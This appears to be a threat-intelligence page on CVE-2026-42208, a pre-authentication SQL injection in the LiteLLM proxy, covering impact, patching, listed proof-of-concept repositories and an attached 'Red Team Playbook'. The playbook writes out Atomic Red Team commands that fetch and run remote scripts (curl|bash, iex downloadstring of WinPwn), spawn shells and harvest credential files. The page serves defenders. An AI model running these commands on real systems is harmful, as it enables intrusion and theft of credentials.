CVE-2026-42208
Overview
This vulnerability is a SQL injection caused by improper handling of user-supplied input in a database query. Specifically, the proxy server component of LiteLLM improperly concatenates the Authorization header value directly into the SQL query string instead of using parameterized queries. The affected feature is the API key verification mechanism within the proxy’s error-handling path that interacts with the backend database.
Vulnerability Description
LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.81.16 to before version 1.83.7, a database query used during proxy API key checks mixed the caller-supplied key value into the query text instead of passing it as a separate parameter. An unauthenticated attacker could send a specially crafted Authorization header to any LLM API route (for example POST /chat/completions) and reach this query through the proxy's error-handling path. An attacker could read data from the proxy's database and may be able to modify it, leading to unauthorised access to the proxy and the credentials it manages. This issue has been patched in version 1.83.7.
Impact
An unauthenticated attacker can exploit this SQL injection to access and manipulate sensitive data stored in the proxy’s database, including API keys and credentials managed by the proxy. This enables unauthorized access to the proxy service and potentially to downstream LLM API services. No authentication or user interaction is required to trigger the vulnerability, allowing full compromise of the proxy’s data integrity and confidentiality, leading to potential credential theft and service misuse.
Solution
Upgrade LiteLLM to version 1.83.7 or later, where the issue is patched by properly parameterizing database queries during API key validation. Refer to the official BerriAI security advisory at https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc and the release notes at https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable for detailed patch instructions and verification steps.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in LiteLLM arises from improper handling of user-supplied data during database query construction. Specifically, the issue lies in the way the proxy server processes API key checks. Instead of treating the caller-supplied key as a parameter, it is concatenated directly into the query string. This flaw exposes the system to SQL injection attacks, where an attacker can manipulate the Authorization header to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication checks and gain unauthorized access to sensitive data stored within the proxy's database. The risk is particularly pronounced because the proxy manages credentials and other sensitive information, making it a lucrative target for malicious actors.
Exploitation of this vulnerability can occur through various attack vectors. An unauthenticated attacker could craft a malicious request to any LLM API route, such as POST /chat/completions, and include a specially formatted Authorization header. This request would then traverse the proxy's error-handling path, reaching the vulnerable database query. Once the attacker successfully executes the crafted request, they can potentially read sensitive information from the database, including API keys, user data, and other confidential information. Moreover, if the database permissions allow, the attacker might also modify or delete data, further escalating the impact of the breach.
The real-world implications of this vulnerability are significant, particularly for organizations relying on LiteLLM for API management and integration with large language models. Unauthorized access to the proxy's database could lead to data breaches, exposing sensitive information to competitors or cybercriminals. The potential for data manipulation poses additional risks, as attackers could alter API keys or other critical configurations, leading to service disruptions or further exploitation. The business risk is compounded by the potential for reputational damage, regulatory penalties, and loss of customer trust, all of which can have long-lasting effects on an organization’s bottom line.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, upgrading to the patched version of LiteLLM (1.83.7 or later) is crucial to eliminate the inherent flaw in the database query handling. Additionally, employing web application firewalls (WAFs) can help detect and block malicious requests that attempt to exploit this vulnerability. Regular security audits and code reviews should also be conducted to identify similar vulnerabilities in custom implementations or third-party libraries. Furthermore, organizations should adopt a principle of least privilege for database access, ensuring that even if an attacker gains access, their ability to manipulate data is limited.
In conclusion, the vulnerability in LiteLLM represents a serious threat to organizations utilizing this proxy server for API management. The ease of exploitation combined with the potential for significant data exposure and manipulation underscores the importance of proactive security measures. By promptly addressing the vulnerability through updates and implementing robust detection and mitigation strategies, organizations can safeguard their systems against unauthorized access and maintain the integrity of their sensitive data.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-42208, accompanied by the emergence of multiple new proof-of-concept exploits publicly available on GitHub. This surge in attacker activity is further underscored by the vulnerability’s recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog, signaling increased recognition of its criticality at the federal level. Our telemetry indicates that exploitation tools are becoming more accessible and automated, lowering the barrier for threat actors to leverage this pre-authentication SQL injection flaw. The vulnerability’s CVSS score has been formally established at 9.8, reflecting its critical severity, and the EPSS score now places it in the upper percentile for likely exploitation, confirming the elevated risk posture. These developments collectively heighten the urgency for defenders to prioritize detection and response capabilities, as the attack surface has expanded rapidly with active exploitation in the wild. The risk assessment for CVE-2026-42208 must be updated to reflect a critical threat level with a high probability of exploitation, increasing the potential for unauthorized data access and manipulation in affected LiteLLM deployments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Litellm | Litellm | All |
cpe:2.3:a:litellm:litellm:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
BerriAI LiteLLM Proxy Pre-Auth SQL Injection Scanner
auxiliary/scanner/http/litellm_proxy_sqli
|
Tencent YunDing Security Lab, Kenneth LaCroix | Unknown | - | View |
GitHub PoCs (9)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
0xBlackash/CVE-2026-42208
CVE-2026-40487
|
0xBlackash | 0 | 1 | 2026-05-03 | View |
|
yendpoint/CVE-2026-42208-LAB
A local lab for studying, reproducing, and verifying the patch for CVE-2026-42208: an unauthenticated SQL injection in L...
|
yendpoint | 0 | 0 | 2026-06-18 | View |
|
rootdirective-sec/CVE-2026-42208-Lab
|
rootdirective-sec | 0 | 0 | 2026-05-10 | View |
|
ridhinva/litellm-sqli-scanner
CVE-2026-42208 - LiteLLM SQL Injection vulnerability scanner for BerriAI LiteLLM proxy instances
|
ridhinva | 0 | 0 | 2026-05-22 | View |
|
HAERIN-L/poc_cve-2026-42208
|
HAERIN-L | 0 | 0 | 2026-05-30 | View |
|
ridhinva/litellm-scanner
CVE-2026-42208 - LiteLLM SQL Injection vulnerability scanner for BerriAI LiteLLM proxy instances
|
ridhinva | 0 | 0 | 2026-05-22 | View |
|
imjdl/CVE-2026-42208_lab
CVE-2026-42208 lab
|
imjdl | 0 | 0 | 2026-04-28 | View |
|
rootdirective-sec/cve-2026-42208-Lab
|
rootdirective-sec | 0 | 0 | 2026-05-10 | View |
|
Zeltoc/threat-intel-brief-cve-2026-42208-litellm
Threat intelligence brief on CVE-2026-42208, a critical pre-auth SQL injection in BerriAI LiteLLM exploited within 36 ho...
|
Zeltoc | 0 | 0 | 2026-05-10 | View |
Threat Feed
26 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Active exploitation confirmed — vendor: BerriAI, product: LiteLLM
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-42208 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-42208 |
| access.redhat.com |
NVD API
|
https://access.redhat.com/security/cve/CVE-2026-42208 |
| bugzilla.redhat.com |
NVD API
|
https://bugzilla.redhat.com/show_bug.cgi?id=2463965 |
| security.access.redhat.com |
NVD API
|
https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-42208.json |